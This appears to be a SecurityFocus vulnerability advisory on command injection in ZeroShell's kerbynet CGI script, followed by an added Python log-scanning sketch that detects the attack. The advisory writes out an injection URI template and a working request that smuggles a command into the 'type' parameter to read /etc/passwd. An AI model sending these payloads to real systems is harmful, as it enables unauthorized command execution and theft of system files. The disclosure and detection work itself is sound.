ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability

An attacker may exploit this issue via a browser.

The following example URI and request are available:

http://www.example.com/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;[CMD HERE];%22

HTTP request:
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: IP
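
A detection sketch for the request shown above, added here and not part of the original advisory: it scans web access-log lines for kerbynet x509List requests whose URL-decoded type parameter contains shell metacharacters. The log lines, the CMD placeholder, the EXAMPLE value and the metacharacter set are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Heuristic (assumption): characters that can end a quoted shell argument
# or chain a second command once the value has been URL-decoded.
SHELL_META = re.compile(r'["\';|&`$<>\r\n]')
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format). CMD stands in
# for the advisory's [CMD HERE]; EXAMPLE is a made-up benign value.
LOG_LINES = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cgi-bin/kerbynet'
    '?Section=NoAuthREQ&Action=x509List&type=*%22;CMD;%22 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /cgi-bin/kerbynet'
    '?Section=NoAuthREQ&Action=x509List&type=x%22%3BCMD%3B%22 HTTP/1.1" 200 512',
    '192.0.2.20 - - [01/Jan/2010:10:01:00 +0000] "GET /cgi-bin/kerbynet'
    '?Section=NoAuthREQ&Action=x509List&type=EXAMPLE HTTP/1.1" 200 900',
    '192.0.2.30 - - [01/Jan/2010:10:02:00 +0000] "GET /index.html'
    '?type=%22;CMD;%22 HTTP/1.1" 404 120',
]

def suspicious_type_values(request_target):
    """Return decoded `type` values of an x509List request to kerbynet
    that contain shell metacharacters; empty list if none."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/cgi-bin/kerbynet"):
        return []
    # Split on '&' only, so a raw ';' stays inside the parameter value.
    params = parse_qs(parts.query, keep_blank_values=True, separator="&")
    if "x509List" not in params.get("Action", []):
        return []
    return [v for v in params.get("type", []) if SHELL_META.search(v)]

def scan(lines):
    """Return (client_ip, suspicious_values) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        values = suspicious_type_values(match.group(1))
        if values:
            hits.append((line.split()[0], values))
    return hits

if __name__ == "__main__":
    for client, values in scan(LOG_LINES):
        print(client, values)
```

The check decodes each parameter once, so a double-encoded value would need a second decoding pass before matching.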


Copyright 2010, SecurityFocus